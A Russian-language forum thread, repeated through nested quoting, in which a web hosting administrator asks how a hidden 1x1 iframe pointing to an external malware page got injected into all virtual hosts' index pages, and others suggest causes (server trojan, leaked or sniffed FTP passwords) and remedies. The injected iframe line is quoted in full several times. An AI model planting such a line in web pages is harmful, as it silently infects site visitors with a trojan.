Здравствуйте.
На всех индексных страницах вирт. хостов появилась строка:
echo "";echo "";echo "";echo "";echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";Может кто-нибудь знает каким образом? Как от этого избавиться? Потому что человек который попадает на сайт засасывает к себе трояна !!! :(((
Заранее спасибо.
На сервере возможно стоит троянец.
Это изменение действительно прошло на индексных страницах _всех_ виртуальных хостов?
Даты модификации файлов есть? Они совпадают?>Здравствуйте.
>На всех индексных страницах вирт. хостов появилась строка:
>echo "";echo "";echo "";echo "";echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
>
>Может кто-нибудь знает каким образом? Как от этого избавиться? Потому что человек
>который попадает на сайт засасывает к себе трояна !!! :(((
>
>Заранее спасибо.
>На сервере возможно стоит троянец.
>Это изменение действительно прошло на индексных страницах _всех_ виртуальных хостов?
>Даты модификации файлов есть? Они совпадают?
>
>>Здравствуйте.
>>На всех индексных страницах вирт. хостов появилась строка:
>>echo "";echo "";echo "";echo "";echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
>>
>>Может кто-нибудь знает каким образом? Как от этого избавиться? Потому что человек
>>который попадает на сайт засасывает к себе трояна !!! :(((
>>
>>Заранее спасибо.на некоторых индексных страницах их нет.
после удаления строки с ифрэймом она появляется снова.
Посмотрел по логам ftp сервера увидел ип которым модифицировались все индексные страницы.
Загнал его в фаерволом в бан. Есть мысль запустить ftp сервер на нестандартном порту и сменить ftp пароли.
Может еще что посоветуете?
Добрый день!
Мы встречали такую проблему у других хостеров. До сих пор определить причину не удалось.
Пришлите пожалуйста ваши координаты, чтоб связаться с вами напрямую. Вместе мы можем попытаться установить источник проблемы.Предположительно два варианта:
1) утечка базы паролей пользователей.
2) подслушивание ftp-сессии на крупном маршрутизаторе.С уважением,
Виталий>>На сервере возможно стоит троянец.
>>Это изменение действительно прошло на индексных страницах _всех_ виртуальных хостов?
>>Даты модификации файлов есть? Они совпадают?
>>
>>>Здравствуйте.
>>>На всех индексных страницах вирт. хостов появилась строка:
>>>echo "";echo "";echo "";echo "";echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
>>>
>>>Может кто-нибудь знает каким образом? Как от этого избавиться? Потому что человек
>>>который попадает на сайт засасывает к себе трояна !!! :(((
>>>
>>>Заранее спасибо.
>
>на некоторых индексных страницах их нет.
>после удаления строки с ифрэймом она появляется снова.
>Посмотрел по логам ftp сервера увидел ип которым модифицировались все индексные страницы.
>
>Загнал его в фаерволом в бан. Есть мысль запустить ftp сервер на
>нестандартном порту и сменить ftp пароли.
>Может еще что посоветуете?
>Здравствуйте.
>На всех индексных страницах вирт. хостов появилась строка:
>echo "";echo "";echo "";echo "";echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
>
>Может кто-нибудь знает каким образом? Как от этого избавиться? Потому что человек
>который попадает на сайт засасывает к себе трояна !!! :(((
>
>Заранее спасибо.
http://vitafil.habrahabr.ru/blog/8158.html